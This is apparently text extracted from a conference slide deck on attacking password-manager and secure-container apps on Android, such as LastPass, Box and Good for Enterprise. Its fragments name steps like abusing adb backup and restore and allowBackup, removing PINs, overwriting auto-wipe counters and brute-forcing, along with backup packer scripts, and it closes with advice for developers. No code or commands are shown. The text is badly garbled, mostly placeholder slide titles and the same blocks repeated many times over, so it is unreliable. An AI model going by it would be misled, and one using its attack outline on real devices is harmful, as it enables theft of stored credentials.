Slide 28

Slide 29

Slide 30

Slide 31

Slide 32


Slide 34

Slide 35

Slide 36

Slide 37

Slide 38

Scenario

Slide 40

Slide 41

Slide 42

Slide 43

Slide 44

Slide 45

Slide 46

Slide 47

Slide 48

Slide 49

Slide 50

Slide 51

Slide 52

Slide 53

Slide 54

Slide 55

Slide 56

Slide 57

Slide 58


Slide 60

Slide 61






Supporting Tools

Slide 68

Slide 69

Slide 70

Slide 71

Slide 72

lastpass

lastpass (2)

Slide 75

Slide 76

Slide 77

Slide 78

Slide 79

Slide 80

Slide 81

AndroidManifestxml


Slide 84

Slide 85

Slide 86

Android Backup (ab)

Slide 88

LPandroidxml

Slide 90

Slide 91

Slide 92

Slide 93

Slide 94

Theory

Proposed Attack

Slide 97

Slide 98

Slide 99

Slide 100

Slide 101

Slide 102

Slide 103

Slide 104

Slide 105

Slide 106

Slide 107

Slide 108

Slide 109

Slide 110

Easier Attack

Slide 112

Slide 113

Slide 114

Slide 115

Persistence

Slide 117

Slide 118

Slide 119

Slide 120

Slide 121

Slide 122

Slide 123

Slide 124

Slide 125

Slide 126

Slide 127

Slide 128

Slide 129

Slide 130

Slide 131

Slide 132

Slide 133

Slide 134

Slide 135

Slide 136

Slide 137

Slide 138

Slide 139

Slide 140

Slide 141

Slide 142

Slide 143

Slide 144

GOOD


Slide 147

Slide 148

Slide 149

Slide 150

Slide 151

Slide 152

Slide 153

Slide 154

Slide 155

Slide 156

Slide 157


DERP

Slide 160

Theory (2)

Slide 162

Slide 163

Slide 164

Slide 165

Slide 166

Naiumlve Attack

Slide 168

Slide 169




Slide 173

Slide 174

Slide 175

Slide 176

Slide 177

Slide 178

Slide 179

Slide 180

Adv Attack

Slide 182

Minimize keyspace

Slide 184

Slide 185

Slide 186

Slide 187

Slide 188

Slide 189

methodology

Slide 191

Slide 192

Slide 193

Slide 194

Slide 195

Slide 196

Slide 197

Slide 198

ab_unpackerpy

ab_packerpy

Slide 201

Slide 202

Slide 203

Slide 204

Slide 205

Slide 206

Slide 207

Slide 208

Slide 209

Slide 210



Slide 213

Slide 214

Reinstall flag

Slide 216

Uninstall Reinstall

Slide 218

Slide 219

Slide 220

Slide 221

Slide 222

Slide 223

Slide 224

Slide 225

Slide 226

Slide 227

Slide 228

Slide 229

Slide 230

Slide 231

Slide 232

Slide 233

Slide 234

Slide 235

Slide 236

Slide 237

androidallowBackup

Slide 239

Slide 240

Slide 241

Securing Apps

Slide 243

Securing Apps (2)

Slide 245

Extra Security

Slide 247

Users

Users (2)

Slide 250

Slide 251

Slide 252

Slide 253






HOW O

2

][


keep it simple










adbcrash course





























adb shell



Supporting Tools




3

][Closerlook



lastpass


lastpass




lastpass



Why store

the PW





Itrsquos

thoughOK


You can enable a

PIN





PIN ==

SECURE


AndroidManifestxml



AndroidManifestxml


Default true









Android Backup (ab)


LPandroidxml





0ltstringgt




( )THEORY




drop_the_DBass()end


Theory




Proposed Attack

















counter++



We get

tries10000



We get

tries10000








PROFIT


Easier Attack


bull remove PIN


easierhellip



>


for points





Persistence






PROFIT++



spideroak



spideroak


I said not bad


httpsspideroakcom


Thats good


but users are dumb


and spideroak



8




spideroak






boxcom


Boxcom





REPHRASE

POLICYYOUR

AGRESSIVE MUCH




alreadyhellip


Boxcom




xxxxxltstringgt

hashed pin

myPreferencexml




b cunning or wily


Boxcom


bull Profit


>



GOODfor enterprise


GOOD




httpswwwgoodcom






httpswwwgoodcom




PROBLEM

1


unlike LastPass


preferences are

encrypted


PROBLEM

2




Disable PIN


auto-wipe counter


brute-force


buthellip



AndroidManifestxml

DE

RP


THEORY

1


Theory



THEORY

2


adb restore


over writeauto-wipe

counter


facepalm


brute-force


Naiumlve Attack




PROBLEM

3





















Device

CONTAINER


Device

CONTAINER


Device

CONTAINER

facepalm

facepalm


Adv Attack



Minimize keyspace





herersquos one I

Made earlier


>


PROFIT


4

][Makıngit easy


methodology


















automatıon


Pythontothe rescue


ab_unpackerpy



ab_packerpy



Makes 0wning things


200 quicker

1000 funner

oo

oo


Bonus

n0t a bug





exploit










METHOD

1


Reinstall flag




METHOD

2


Uninstall Reinstall





exploit


derpppp

derp

DerpderpDERPDE

RPderp

derp

Derpderp DE

RP

derp DerpderP


5

][ RE

VIEW



=SECURE containers


Physıcal access


Devıcesecurity


Datasecurity


51

)( ITFIX


specificissues


lastpass


spideroak


boxcom


GOODfor enterprise


Developers

Can youread this


androidallowBackup



Some devs

GET it



pref fıles


Securing Apps





androıd backup


Securing Apps




extra securıty


Extra Security



bull easy to fool

usersen

d


Users






Users



QuestionsOMFG

A Talking Horse

Bite me space boy




Slide 2

Slide 3

Slide 4

Slide 5

Slide 6

Slide 7

Slide 8

Slide 9

Slide 10

Slide 11

Slide 12

Slide 13

Slide 14


Slide 16

Slide 17

Slide 18

Slide 19

Slide 20

Slide 21

Slide 22

Slide 23

Slide 24

Slide 25

Slide 26

Slide 27

Slide 28

Slide 29

Slide 30

Slide 31

Slide 32


Slide 34

Slide 35

Slide 36

Slide 37

Slide 38

Scenario

Slide 40

Slide 41

Slide 42

Slide 43

Slide 44

Slide 45

Slide 46

Slide 47

Slide 48

Slide 49

Slide 50

Slide 51

Slide 52

Slide 53

Slide 54

Slide 55

Slide 56

Slide 57

Slide 58


Slide 60

Slide 61






Supporting Tools

Slide 68

Slide 69

Slide 70

Slide 71

Slide 72

lastpass

lastpass (2)

Slide 75

Slide 76

Slide 77

Slide 78

Slide 79

Slide 80

Slide 81

AndroidManifestxml


Slide 84

Slide 85

Slide 86

Android Backup (ab)

Slide 88

LPandroidxml

Slide 90

Slide 91

Slide 92

Slide 93

Slide 94

Theory

Proposed Attack

Slide 97

Slide 98

Slide 99

Slide 100

Slide 101

Slide 102

Slide 103

Slide 104

Slide 105

Slide 106

Slide 107

Slide 108

Slide 109

Slide 110

Easier Attack

Slide 112

Slide 113

Slide 114

Slide 115

Persistence

Slide 117

Slide 118

Slide 119

Slide 120

Slide 121

Slide 122

Slide 123

Slide 124

Slide 125

Slide 126

Slide 127

Slide 128

Slide 129

Slide 130

Slide 131

Slide 132

Slide 133

Slide 134

Slide 135

Slide 136

Slide 137

Slide 138

Slide 139

Slide 140

Slide 141

Slide 142

Slide 143

Slide 144

GOOD


Slide 147

Slide 148

Slide 149

Slide 150

Slide 151

Slide 152

Slide 153

Slide 154

Slide 155

Slide 156

Slide 157


DERP

Slide 160

Theory (2)

Slide 162

Slide 163

Slide 164

Slide 165

Slide 166

Naiumlve Attack

Slide 168

Slide 169




Slide 173

Slide 174

Slide 175

Slide 176

Slide 177

Slide 178

Slide 179

Slide 180

Adv Attack

Slide 182

Minimize keyspace

Slide 184

Slide 185

Slide 186

Slide 187

Slide 188

Slide 189

methodology

Slide 191

Slide 192

Slide 193

Slide 194

Slide 195

Slide 196

Slide 197

Slide 198

ab_unpackerpy

ab_packerpy

Slide 201

Slide 202

Slide 203

Slide 204

Slide 205

Slide 206

Slide 207

Slide 208

Slide 209

Slide 210



Slide 213

Slide 214

Reinstall flag

Slide 216

Uninstall Reinstall

Slide 218

Slide 219

Slide 220

Slide 221

Slide 222

Slide 223

Slide 224

Slide 225

Slide 226

Slide 227

Slide 228

Slide 229

Slide 230

Slide 231

Slide 232

Slide 233

Slide 234

Slide 235

Slide 236

Slide 237

androidallowBackup

Slide 239

Slide 240

Slide 241

Securing Apps

Slide 243

Securing Apps (2)

Slide 245

Extra Security

Slide 247

Users

Users (2)

Slide 250

Slide 251

Slide 252

Slide 253


keep it simple










adbcrash course





























adb shell



Supporting Tools




3

][Closerlook



lastpass


lastpass




lastpass



Why store

the PW





Itrsquos

thoughOK


You can enable a

PIN





PIN ==

SECURE


AndroidManifestxml



AndroidManifestxml


Default true









Android Backup (ab)


LPandroidxml





0ltstringgt




( )THEORY




drop_the_DBass()end


Theory




Proposed Attack

















counter++



We get

tries10000



We get

tries10000








PROFIT


Easier Attack


bull remove PIN


easierhellip



>


for points





Persistence






PROFIT++



spideroak



spideroak


I said not bad


httpsspideroakcom


Thats good


but users are dumb


and spideroak



8




spideroak






boxcom


Boxcom





REPHRASE

POLICYYOUR

AGRESSIVE MUCH




alreadyhellip


Boxcom




xxxxxltstringgt

hashed pin

myPreferencexml




b cunning or wily


Boxcom


bull Profit


>



GOODfor enterprise


GOOD




httpswwwgoodcom






httpswwwgoodcom




PROBLEM

1


unlike LastPass


preferences are

encrypted


PROBLEM

2




Disable PIN


auto-wipe counter


brute-force


buthellip



AndroidManifestxml

DE

RP


THEORY

1


Theory



THEORY

2


adb restore


over writeauto-wipe

counter


facepalm


brute-force


Naiumlve Attack




PROBLEM

3





















Device

CONTAINER


Device

CONTAINER


Device

CONTAINER

facepalm

facepalm


Adv Attack



Minimize keyspace





herersquos one I

Made earlier


>


PROFIT


4

][Makıngit easy


methodology


















automatıon


Pythontothe rescue


ab_unpackerpy



ab_packerpy



Makes 0wning things


200 quicker

1000 funner

oo

oo


Bonus

n0t a bug





exploit










METHOD

1


Reinstall flag




METHOD

2


Uninstall Reinstall





exploit


derpppp

derp

DerpderpDERPDE

RPderp

derp

Derpderp DE

RP

derp DerpderP


5

][ RE

VIEW



=SECURE containers


Physıcal access


Devıcesecurity


Datasecurity


51

)( ITFIX


specificissues


lastpass


spideroak


boxcom


GOODfor enterprise


Developers

Can youread this


androidallowBackup



Some devs

GET it



pref fıles


Securing Apps





androıd backup


Securing Apps




extra securıty


Extra Security



bull easy to fool

usersen

d


Users






Users



QuestionsOMFG

A Talking Horse

Bite me space boy




Slide 2

Slide 3

Slide 4

Slide 5

Slide 6

Slide 7

Slide 8

Slide 9

Slide 10

Slide 11

Slide 12

Slide 13

Slide 14


Slide 16

Slide 17

Slide 18

Slide 19

Slide 20

Slide 21

Slide 22

Slide 23

Slide 24

Slide 25

Slide 26

Slide 27

Slide 28

Slide 29

Slide 30

Slide 31

Slide 32


Slide 34

Slide 35

Slide 36

Slide 37

Slide 38

Scenario

Slide 40

Slide 41

Slide 42

Slide 43

Slide 44

Slide 45

Slide 46

Slide 47

Slide 48

Slide 49

Slide 50

Slide 51

Slide 52

Slide 53

Slide 54

Slide 55

Slide 56

Slide 57

Slide 58


Slide 60

Slide 61






Supporting Tools

Slide 68

Slide 69

Slide 70

Slide 71

Slide 72

lastpass

lastpass (2)

Slide 75

Slide 76

Slide 77

Slide 78

Slide 79

Slide 80

Slide 81

AndroidManifestxml


Slide 84

Slide 85

Slide 86

Android Backup (ab)

Slide 88

LPandroidxml

Slide 90

Slide 91

Slide 92

Slide 93

Slide 94

Theory

Proposed Attack

Slide 97

Slide 98

Slide 99

Slide 100

Slide 101

Slide 102

Slide 103

Slide 104

Slide 105

Slide 106

Slide 107

Slide 108

Slide 109

Slide 110

Easier Attack

Slide 112

Slide 113

Slide 114

Slide 115

Persistence

Slide 117

Slide 118

Slide 119

Slide 120

Slide 121

Slide 122

Slide 123

Slide 124

Slide 125

Slide 126

Slide 127

Slide 128

Slide 129

Slide 130

Slide 131

Slide 132

Slide 133

Slide 134

Slide 135

Slide 136

Slide 137

Slide 138

Slide 139

Slide 140

Slide 141

Slide 142

Slide 143

Slide 144

GOOD


Slide 147

Slide 148

Slide 149

Slide 150

Slide 151

Slide 152

Slide 153

Slide 154

Slide 155

Slide 156

Slide 157


DERP

Slide 160

Theory (2)

Slide 162

Slide 163

Slide 164

Slide 165

Slide 166

Naiumlve Attack

Slide 168

Slide 169




Slide 173

Slide 174

Slide 175

Slide 176

Slide 177

Slide 178

Slide 179

Slide 180

Adv Attack

Slide 182

Minimize keyspace

Slide 184

Slide 185

Slide 186

Slide 187

Slide 188

Slide 189

methodology

Slide 191

Slide 192

Slide 193

Slide 194

Slide 195

Slide 196

Slide 197

Slide 198

ab_unpackerpy

ab_packerpy

Slide 201

Slide 202

Slide 203

Slide 204

Slide 205

Slide 206

Slide 207

Slide 208

Slide 209

Slide 210



Slide 213

Slide 214

Reinstall flag

Slide 216

Uninstall Reinstall

Slide 218

Slide 219

Slide 220

Slide 221

Slide 222

Slide 223

Slide 224

Slide 225

Slide 226

Slide 227

Slide 228

Slide 229

Slide 230

Slide 231

Slide 232

Slide 233

Slide 234

Slide 235

Slide 236

Slide 237

androidallowBackup

Slide 239

Slide 240

Slide 241

Securing Apps

Slide 243

Securing Apps (2)

Slide 245

Extra Security

Slide 247

Users

Users (2)

Slide 250

Slide 251

Slide 252

Slide 253










adbcrash course





























adb shell



Supporting Tools




3

][Closerlook



lastpass


lastpass




lastpass



Why store

the PW





Itrsquos

thoughOK


You can enable a

PIN





PIN ==

SECURE


AndroidManifestxml



AndroidManifestxml


Default true









Android Backup (ab)


LPandroidxml





0ltstringgt




( )THEORY




drop_the_DBass()end


Theory




Proposed Attack

















counter++



We get

tries10000



We get

tries10000








PROFIT


Easier Attack


bull remove PIN


easierhellip



>


for points





Persistence






PROFIT++



spideroak



spideroak


I said not bad


httpsspideroakcom


Thats good


but users are dumb


and spideroak



8




spideroak






boxcom


Boxcom





REPHRASE

POLICYYOUR

AGRESSIVE MUCH




alreadyhellip


Boxcom




xxxxxltstringgt

hashed pin

myPreferencexml




b cunning or wily


Boxcom


bull Profit


>



GOODfor enterprise


GOOD




httpswwwgoodcom






httpswwwgoodcom




PROBLEM

1


unlike LastPass


preferences are

encrypted


PROBLEM

2




Disable PIN


auto-wipe counter


brute-force


buthellip



AndroidManifestxml

DE

RP


THEORY

1


Theory



THEORY

2


adb restore


over writeauto-wipe

counter


facepalm


brute-force


Naiumlve Attack




PROBLEM

3





















Device

CONTAINER


Device

CONTAINER


Device

CONTAINER

facepalm

facepalm


Adv Attack



Minimize keyspace





herersquos one I

Made earlier


>


PROFIT


4

][Makıngit easy


methodology


















automatıon


Pythontothe rescue


ab_unpackerpy



ab_packerpy



Makes 0wning things


200 quicker

1000 funner

oo

oo


Bonus

n0t a bug





exploit










METHOD

1


Reinstall flag




METHOD

2


Uninstall Reinstall





exploit


derpppp

derp

DerpderpDERPDE

RPderp

derp

Derpderp DE

RP

derp DerpderP


5

][ RE

VIEW



=SECURE containers


Physıcal access


Devıcesecurity


Datasecurity


51

)( ITFIX


specificissues


lastpass


spideroak


boxcom


GOODfor enterprise


Developers

Can youread this


androidallowBackup



Some devs

GET it



pref fıles


Securing Apps





androıd backup


Securing Apps




extra securıty


Extra Security



bull easy to fool

usersen

d


Users






Users



QuestionsOMFG

A Talking Horse

Bite me space boy




Slide 2

Slide 3

Slide 4

Slide 5

Slide 6

Slide 7

Slide 8

Slide 9

Slide 10

Slide 11

Slide 12

Slide 13

Slide 14


Slide 16

Slide 17

Slide 18

Slide 19

Slide 20

Slide 21

Slide 22

Slide 23

Slide 24

Slide 25

Slide 26

Slide 27

Slide 28

Slide 29

Slide 30

Slide 31

Slide 32


Slide 34

Slide 35

Slide 36

Slide 37

Slide 38

Scenario

Slide 40

Slide 41

Slide 42

Slide 43

Slide 44

Slide 45

Slide 46

Slide 47

Slide 48

Slide 49

Slide 50

Slide 51

Slide 52

Slide 53

Slide 54

Slide 55

Slide 56

Slide 57

Slide 58


Slide 60

Slide 61






Supporting Tools

Slide 68

Slide 69

Slide 70

Slide 71

Slide 72

lastpass

lastpass (2)

Slide 75

Slide 76

Slide 77

Slide 78

Slide 79

Slide 80

Slide 81

AndroidManifestxml


Slide 84

Slide 85

Slide 86

Android Backup (ab)

Slide 88

LPandroidxml

Slide 90

Slide 91

Slide 92

Slide 93

Slide 94

Theory

Proposed Attack

Slide 97

Slide 98

Slide 99

Slide 100

Slide 101

Slide 102

Slide 103

Slide 104

Slide 105

Slide 106

Slide 107

Slide 108

Slide 109

Slide 110

Easier Attack

Slide 112

Slide 113

Slide 114

Slide 115

Persistence

Slide 117

Slide 118

Slide 119

Slide 120

Slide 121

Slide 122

Slide 123

Slide 124

Slide 125

Slide 126

Slide 127

Slide 128

Slide 129

Slide 130

Slide 131

Slide 132

Slide 133

Slide 134

Slide 135

Slide 136

Slide 137

Slide 138

Slide 139

Slide 140

Slide 141

Slide 142

Slide 143

Slide 144

GOOD


Slide 147

Slide 148

Slide 149

Slide 150

Slide 151

Slide 152

Slide 153

Slide 154

Slide 155

Slide 156

Slide 157


DERP

Slide 160

Theory (2)

Slide 162

Slide 163

Slide 164

Slide 165

Slide 166

Naiumlve Attack

Slide 168

Slide 169




Slide 173

Slide 174

Slide 175

Slide 176

Slide 177

Slide 178

Slide 179

Slide 180

Adv Attack

Slide 182

Minimize keyspace

Slide 184

Slide 185

Slide 186

Slide 187

Slide 188

Slide 189

methodology

Slide 191

Slide 192

Slide 193

Slide 194

Slide 195

Slide 196

Slide 197

Slide 198

ab_unpackerpy

ab_packerpy

Slide 201

Slide 202

Slide 203

Slide 204

Slide 205

Slide 206

Slide 207

Slide 208

Slide 209

Slide 210



Slide 213

Slide 214

Reinstall flag

Slide 216

Uninstall Reinstall

Slide 218

Slide 219

Slide 220

Slide 221

Slide 222

Slide 223

Slide 224

Slide 225

Slide 226

Slide 227

Slide 228

Slide 229

Slide 230

Slide 231

Slide 232

Slide 233

Slide 234

Slide 235

Slide 236

Slide 237

androidallowBackup

Slide 239

Slide 240

Slide 241

Securing Apps

Slide 243

Securing Apps (2)

Slide 245

Extra Security

Slide 247

Users

Users (2)

Slide 250

Slide 251

Slide 252

Slide 253





























adb shell



Supporting Tools




3

][Closerlook



lastpass


lastpass




lastpass



Why store

the PW





Itrsquos

thoughOK


You can enable a

PIN





PIN ==

SECURE


AndroidManifestxml



AndroidManifestxml


Default true









Android Backup (ab)


LPandroidxml





0ltstringgt




( )THEORY




drop_the_DBass()end


Theory




Proposed Attack

















counter++



We get

tries10000



We get

tries10000








PROFIT


Easier Attack


bull remove PIN


easierhellip



>


for points





Persistence






PROFIT++



spideroak



spideroak


I said not bad


httpsspideroakcom


Thats good


but users are dumb


and spideroak



8




spideroak






boxcom


Boxcom





REPHRASE

POLICYYOUR

AGRESSIVE MUCH




alreadyhellip


Boxcom




xxxxxltstringgt

hashed pin

myPreferencexml




b cunning or wily


Boxcom


bull Profit


>



GOODfor enterprise


GOOD




httpswwwgoodcom






httpswwwgoodcom




PROBLEM

1


unlike LastPass


preferences are

encrypted


PROBLEM

2




Disable PIN


auto-wipe counter


brute-force


buthellip



AndroidManifestxml

DE

RP


THEORY

1


Theory



THEORY

2


adb restore


over writeauto-wipe

counter


facepalm


brute-force


Naiumlve Attack




PROBLEM

3





















Device

CONTAINER


Device

CONTAINER


Device

CONTAINER

facepalm

facepalm


Adv Attack



Minimize keyspace





herersquos one I

Made earlier


>


PROFIT


4

][Makıngit easy


methodology


















automatıon


Pythontothe rescue


ab_unpackerpy



ab_packerpy



Makes 0wning things


200 quicker

1000 funner

oo

oo


Bonus

n0t a bug





exploit










METHOD

1


Reinstall flag




METHOD

2


Uninstall Reinstall





exploit


derpppp

derp

DerpderpDERPDE

RPderp

derp

Derpderp DE

RP

derp DerpderP


5

][ RE

VIEW



=SECURE containers


Physıcal access


Devıcesecurity


Datasecurity


51

)( ITFIX


specificissues


lastpass


spideroak


boxcom


GOODfor enterprise


Developers

Can youread this


androidallowBackup



Some devs

GET it



pref fıles


Securing Apps





androıd backup


Securing Apps




extra securıty


Extra Security



bull easy to fool

usersen

d


Users






Users



QuestionsOMFG

A Talking Horse

Bite me space boy




Slide 2

Slide 3

Slide 4

Slide 5

Slide 6

Slide 7

Slide 8

Slide 9

Slide 10

Slide 11

Slide 12

Slide 13

Slide 14


Slide 16

Slide 17

Slide 18

Slide 19

Slide 20

Slide 21

Slide 22

Slide 23

Slide 24

Slide 25

Slide 26

Slide 27

Slide 28

Slide 29

Slide 30

Slide 31

Slide 32


Slide 34

Slide 35

Slide 36

Slide 37

Slide 38

Scenario

Slide 40

Slide 41

Slide 42

Slide 43

Slide 44

Slide 45

Slide 46

Slide 47

Slide 48

Slide 49

Slide 50

Slide 51

Slide 52

Slide 53

Slide 54

Slide 55

Slide 56

Slide 57

Slide 58


Slide 60

Slide 61






Supporting Tools

Slide 68

Slide 69

Slide 70

Slide 71

Slide 72

lastpass

lastpass (2)

Slide 75

Slide 76

Slide 77

Slide 78

Slide 79

Slide 80

Slide 81

AndroidManifestxml


Slide 84

Slide 85

Slide 86

Android Backup (ab)

Slide 88

LPandroidxml

Slide 90

Slide 91

Slide 92

Slide 93

Slide 94

Theory

Proposed Attack

Slide 97

Slide 98

Slide 99

Slide 100

Slide 101

Slide 102

Slide 103

Slide 104

Slide 105

Slide 106

Slide 107

Slide 108

Slide 109

Slide 110

Easier Attack

Slide 112

Slide 113

Slide 114

Slide 115

Persistence

Slide 117

Slide 118

Slide 119

Slide 120

Slide 121

Slide 122

Slide 123

Slide 124

Slide 125

Slide 126

Slide 127

Slide 128

Slide 129

Slide 130

Slide 131

Slide 132

Slide 133

Slide 134

Slide 135

Slide 136

Slide 137

Slide 138

Slide 139

Slide 140

Slide 141

Slide 142

Slide 143

Slide 144

GOOD


Slide 147

Slide 148

Slide 149

Slide 150

Slide 151

Slide 152

Slide 153

Slide 154

Slide 155

Slide 156

Slide 157


DERP

Slide 160

Theory (2)

Slide 162

Slide 163

Slide 164

Slide 165

Slide 166

Naiumlve Attack

Slide 168

Slide 169




Slide 173

Slide 174

Slide 175

Slide 176

Slide 177

Slide 178

Slide 179

Slide 180

Adv Attack

Slide 182

Minimize keyspace

Slide 184

Slide 185

Slide 186

Slide 187

Slide 188

Slide 189

methodology

Slide 191

Slide 192

Slide 193

Slide 194

Slide 195

Slide 196

Slide 197

Slide 198

ab_unpackerpy

ab_packerpy

Slide 201

Slide 202

Slide 203

Slide 204

Slide 205

Slide 206

Slide 207

Slide 208

Slide 209

Slide 210



Slide 213

Slide 214

Reinstall flag

Slide 216

Uninstall Reinstall

Slide 218

Slide 219

Slide 220

Slide 221

Slide 222

Slide 223

Slide 224

Slide 225

Slide 226

Slide 227

Slide 228

Slide 229

Slide 230

Slide 231

Slide 232

Slide 233

Slide 234

Slide 235

Slide 236

Slide 237

androidallowBackup

Slide 239

Slide 240

Slide 241

Securing Apps

Slide 243

Securing Apps (2)

Slide 245

Extra Security

Slide 247

Users

Users (2)

Slide 250

Slide 251

Slide 252

Slide 253


Supporting Tools




3

][Closerlook



lastpass


lastpass




lastpass



Why store

the PW





Itrsquos

thoughOK


You can enable a

PIN





PIN ==

SECURE


AndroidManifestxml



AndroidManifestxml


Default true









Android Backup (ab)


LPandroidxml





0ltstringgt




( )THEORY




drop_the_DBass()end


Theory




Proposed Attack

















counter++



We get

tries10000



We get

tries10000








PROFIT


Easier Attack


bull remove PIN


easierhellip



>


for points





Persistence






PROFIT++



spideroak



spideroak


I said not bad


httpsspideroakcom


Thats good


but users are dumb


and spideroak



8




spideroak






boxcom


Boxcom





REPHRASE

POLICYYOUR

AGRESSIVE MUCH




alreadyhellip


Boxcom




xxxxxltstringgt

hashed pin

myPreferencexml




b cunning or wily


Boxcom


bull Profit


>



GOODfor enterprise


GOOD




httpswwwgoodcom






httpswwwgoodcom




PROBLEM

1


unlike LastPass


preferences are

encrypted


PROBLEM

2




Disable PIN


auto-wipe counter


brute-force


buthellip



AndroidManifestxml

DE

RP


THEORY

1


Theory



THEORY

2


adb restore


over writeauto-wipe

counter


facepalm


brute-force


Naiumlve Attack




PROBLEM

3





















Device

CONTAINER


Device

CONTAINER


Device

CONTAINER

facepalm

facepalm


Adv Attack



Minimize keyspace





herersquos one I

Made earlier


>


PROFIT


4

][Makıngit easy


methodology


















automatıon


Pythontothe rescue


ab_unpackerpy



ab_packerpy



Makes 0wning things


200 quicker

1000 funner

oo

oo


Bonus

n0t a bug





exploit










METHOD

1


Reinstall flag




METHOD

2


Uninstall Reinstall





exploit


derpppp

derp

DerpderpDERPDE

RPderp

derp

Derpderp DE

RP

derp DerpderP


5

][ RE

VIEW



=SECURE containers


Physıcal access


Devıcesecurity


Datasecurity


51

)( ITFIX


specificissues


lastpass


spideroak


boxcom


GOODfor enterprise


Developers

Can youread this


androidallowBackup



Some devs

GET it



pref fıles


Securing Apps





androıd backup


Securing Apps




extra securıty


Extra Security



bull easy to fool

usersen

d


Users






Users



QuestionsOMFG

A Talking Horse

Bite me space boy




Slide 2

Slide 3

Slide 4

Slide 5

Slide 6

Slide 7

Slide 8

Slide 9

Slide 10

Slide 11

Slide 12

Slide 13

Slide 14


Slide 16

Slide 17

Slide 18

Slide 19

Slide 20

Slide 21

Slide 22

Slide 23

Slide 24

Slide 25

Slide 26

Slide 27

Slide 28

Slide 29

Slide 30

Slide 31

Slide 32


Slide 34

Slide 35

Slide 36

Slide 37

Slide 38

Scenario

Slide 40

Slide 41

Slide 42

Slide 43

Slide 44

Slide 45

Slide 46

Slide 47

Slide 48

Slide 49

Slide 50

Slide 51

Slide 52

Slide 53

Slide 54

Slide 55

Slide 56

Slide 57

Slide 58


Slide 60

Slide 61






Supporting Tools

Slide 68

Slide 69

Slide 70

Slide 71

Slide 72

lastpass

lastpass (2)

Slide 75

Slide 76

Slide 77

Slide 78

Slide 79

Slide 80

Slide 81

AndroidManifestxml


Slide 84

Slide 85

Slide 86

Android Backup (ab)

Slide 88

LPandroidxml

Slide 90

Slide 91

Slide 92

Slide 93

Slide 94

Theory

Proposed Attack

Slide 97

Slide 98

Slide 99

Slide 100

Slide 101

Slide 102

Slide 103

Slide 104

Slide 105

Slide 106

Slide 107

Slide 108

Slide 109

Slide 110

Easier Attack

Slide 112

Slide 113

Slide 114

Slide 115

Persistence

Slide 117

Slide 118

Slide 119

Slide 120

Slide 121

Slide 122

Slide 123

Slide 124

Slide 125

Slide 126

Slide 127

Slide 128

Slide 129

Slide 130

Slide 131

Slide 132

Slide 133

Slide 134

Slide 135

Slide 136

Slide 137

Slide 138

Slide 139

Slide 140

Slide 141

Slide 142

Slide 143

Slide 144

GOOD


Slide 147

Slide 148

Slide 149

Slide 150

Slide 151

Slide 152

Slide 153

Slide 154

Slide 155

Slide 156

Slide 157


DERP

Slide 160

Theory (2)

Slide 162

Slide 163

Slide 164

Slide 165

Slide 166

Naiumlve Attack

Slide 168

Slide 169




Slide 173

Slide 174

Slide 175

Slide 176

Slide 177

Slide 178

Slide 179

Slide 180

Adv Attack

Slide 182

Minimize keyspace

Slide 184

Slide 185

Slide 186

Slide 187

Slide 188

Slide 189

methodology

Slide 191

Slide 192

Slide 193

Slide 194

Slide 195

Slide 196

Slide 197

Slide 198

ab_unpackerpy

ab_packerpy

Slide 201

Slide 202

Slide 203

Slide 204

Slide 205

Slide 206

Slide 207

Slide 208

Slide 209

Slide 210



Slide 213

Slide 214

Reinstall flag

Slide 216

Uninstall Reinstall

Slide 218

Slide 219

Slide 220

Slide 221

Slide 222

Slide 223

Slide 224

Slide 225

Slide 226

Slide 227

Slide 228

Slide 229

Slide 230

Slide 231

Slide 232

Slide 233

Slide 234

Slide 235

Slide 236

Slide 237

androidallowBackup

Slide 239

Slide 240

Slide 241

Securing Apps

Slide 243

Securing Apps (2)

Slide 245

Extra Security

Slide 247

Users

Users (2)

Slide 250

Slide 251

Slide 252

Slide 253


3

][Closerlook



lastpass


lastpass




lastpass



Why store

the PW





Itrsquos

thoughOK


You can enable a

PIN





PIN ==

SECURE


AndroidManifestxml



AndroidManifestxml


Default true









Android Backup (ab)


LPandroidxml





0ltstringgt




( )THEORY




drop_the_DBass()end


Theory




Proposed Attack

















counter++



We get

tries10000



We get

tries10000








PROFIT


Easier Attack


bull remove PIN


easierhellip



>


for points





Persistence






PROFIT++



spideroak



spideroak


I said not bad


httpsspideroakcom


Thats good


but users are dumb


and spideroak



8




spideroak






boxcom


Boxcom





REPHRASE

POLICYYOUR

AGRESSIVE MUCH




alreadyhellip


Boxcom




xxxxxltstringgt

hashed pin

myPreferencexml




b cunning or wily


Boxcom


bull Profit


>



GOODfor enterprise


GOOD




httpswwwgoodcom






httpswwwgoodcom




PROBLEM

1


unlike LastPass


preferences are

encrypted


PROBLEM

2




Disable PIN


auto-wipe counter


brute-force


buthellip



AndroidManifestxml

DE

RP


THEORY

1


Theory



THEORY

2


adb restore


over writeauto-wipe

counter


facepalm


brute-force


Naiumlve Attack




PROBLEM

3





















Device

CONTAINER


Device

CONTAINER


Device

CONTAINER

facepalm

facepalm


Adv Attack



Minimize keyspace





herersquos one I

Made earlier


>


PROFIT


4

][Makıngit easy


methodology


















automatıon


Pythontothe rescue


ab_unpackerpy



ab_packerpy



Makes 0wning things


200 quicker

1000 funner

oo

oo


Bonus

n0t a bug





exploit










METHOD

1


Reinstall flag




METHOD

2


Uninstall Reinstall





exploit


derpppp

derp

DerpderpDERPDE

RPderp

derp

Derpderp DE

RP

derp DerpderP


5

][ RE

VIEW



=SECURE containers


Physıcal access


Devıcesecurity


Datasecurity


51

)( ITFIX


specificissues


lastpass


spideroak


boxcom


GOODfor enterprise


Developers

Can youread this


androidallowBackup



Some devs

GET it



pref fıles


Securing Apps





androıd backup


Securing Apps




extra securıty


Extra Security



bull easy to fool

usersen

d


Users






Users



QuestionsOMFG

A Talking Horse

Bite me space boy




Slide 2

Slide 3

Slide 4

Slide 5

Slide 6

Slide 7

Slide 8

Slide 9

Slide 10

Slide 11

Slide 12

Slide 13

Slide 14


Slide 16

Slide 17

Slide 18

Slide 19

Slide 20

Slide 21

Slide 22

Slide 23

Slide 24

Slide 25

Slide 26

Slide 27

Slide 28

Slide 29

Slide 30

Slide 31

Slide 32


Slide 34

Slide 35

Slide 36

Slide 37

Slide 38

Scenario

Slide 40

Slide 41

Slide 42

Slide 43

Slide 44

Slide 45

Slide 46

Slide 47

Slide 48

Slide 49

Slide 50

Slide 51

Slide 52

Slide 53

Slide 54

Slide 55

Slide 56

Slide 57

Slide 58


Slide 60

Slide 61






Supporting Tools

Slide 68

Slide 69

Slide 70

Slide 71

Slide 72

lastpass

lastpass (2)

Slide 75

Slide 76

Slide 77

